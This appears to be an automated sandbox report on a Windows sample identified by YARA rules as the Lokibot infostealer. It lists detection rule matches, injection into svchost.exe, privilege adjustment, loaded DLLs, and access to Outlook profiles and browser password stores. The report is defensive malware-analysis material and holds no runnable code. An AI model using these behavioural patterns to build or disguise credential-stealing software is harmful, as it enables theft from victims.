Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.2150829579.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.2150829579.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.2150829579.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000000.00000002.2150829579.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.2150829579.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000002.00000002.3383578074.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000002.00000002.3383578074.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000002.00000002.3383578074.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000002.00000002.3383578074.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.3383578074.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: Process Memory Space: dfiCWCanbj.exe PID: 3580, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 3968, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/6@1/1

Source: C:\Users\user\Desktop\dfiCWCanbj.exe

Code function: 0_2_00B9A06A GetLastError,FormatMessageW,

0_2_00B9A06A

Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B881CB AdjustTokenPrivileges,CloseHandle,	0_2_00B881CB
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B887E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	0_2_00B887E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,	2_2_0040650A

Source: C:\Users\user\Desktop\dfiCWCanbj.exe

Code function: 0_2_00B9B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00B9B3FB

Source: C:\Users\user\Desktop\dfiCWCanbj.exe

Code function: 0_2_00BAEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_00BAEE0D

Source: C:\Users\user\Desktop\dfiCWCanbj.exe

Code function: 0_2_00BA83BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_00BA83BB

Source: C:\Users\user\Desktop\dfiCWCanbj.exe

Code function: 0_2_00B34E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00B34E89

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00333360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,

2_2_00333360

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00333360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,

2_2_00333360

Source: C:\Windows\SysWOW64\svchost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\21c8026919fd094ab07ec3c180a9f210_9e146be9-c76a-4720-bcdb-53011b87bd06

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C

Source: C:\Users\user\Desktop\dfiCWCanbj.exe

File created: C:\Users\user\AppData\Local\Temp\aut4D08.tmp

Jump to behavior

Source: dfiCWCanbj.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\dfiCWCanbj.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: svchost.exe, 00000002.00000003.2142907878.00000000052E5000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: dfiCWCanbj.exe	ReversingLabs: Detection: 55%
Source: dfiCWCanbj.exe	Virustotal: Detection: 62%

Source: unknown	Process created: C:\Users\user\Desktop\dfiCWCanbj.exe "C:\Users\user\Desktop\dfiCWCanbj.exe"
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\dfiCWCanbj.exe"
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\dfiCWCanbj.exe"	Jump to behavior

Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: dfiCWCanbj.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: dfiCWCanbj.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: dfiCWCanbj.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: dfiCWCanbj.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: dfiCWCanbj.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: dfiCWCanbj.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: dfiCWCanbj.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wntdll.pdbUGP source: dfiCWCanbj.exe, 00000000.00000003.2141548342.0000000003CC0000.00000004.00001000.00020000.00000000.sdmp, dfiCWCanbj.exe, 00000000.00000003.2138697881.0000000003DB0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: dfiCWCanbj.exe, 00000000.00000003.2141548342.0000000003CC0000.00000004.00001000.00020000.00000000.sdmp, dfiCWCanbj.exe, 00000000.00000003.2138697881.0000000003DB0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: svchost.exe, svchost.exe, 00000002.00000002.3383506811.0000000000331000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: svchost.pdbUGP source: svchost.exe, 00000002.00000002.3383506811.0000000000331000.00000020.00000001.01000000.00000005.sdmp

Source: dfiCWCanbj.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: dfiCWCanbj.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: dfiCWCanbj.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: dfiCWCanbj.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: dfiCWCanbj.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Yara detected aPLib compressed binary

Source: Yara match	File source: 0.2.dfiCWCanbj.exe.3bf0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.dfiCWCanbj.exe.3bf0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2150829579.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3383578074.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dfiCWCanbj.exe PID: 3580, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3968, type: MEMORYSTR

Source: C:\Users\user\Desktop\dfiCWCanbj.exe

Code function: 0_2_00B34B37 LoadLibraryA,GetProcAddress,

0_2_00B34B37

Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B58945 push ecx; ret	0_2_00B58958
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402AC0 push eax; ret	2_2_00402AD4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402AC0 push eax; ret	2_2_00402AFC

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00333360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,

2_2_00333360

Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B348D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00B348D7
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00BB5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00BB5376

Source: C:\Users\user\Desktop\dfiCWCanbj.exe

Code function: 0_2_00B53187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00B53187

Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
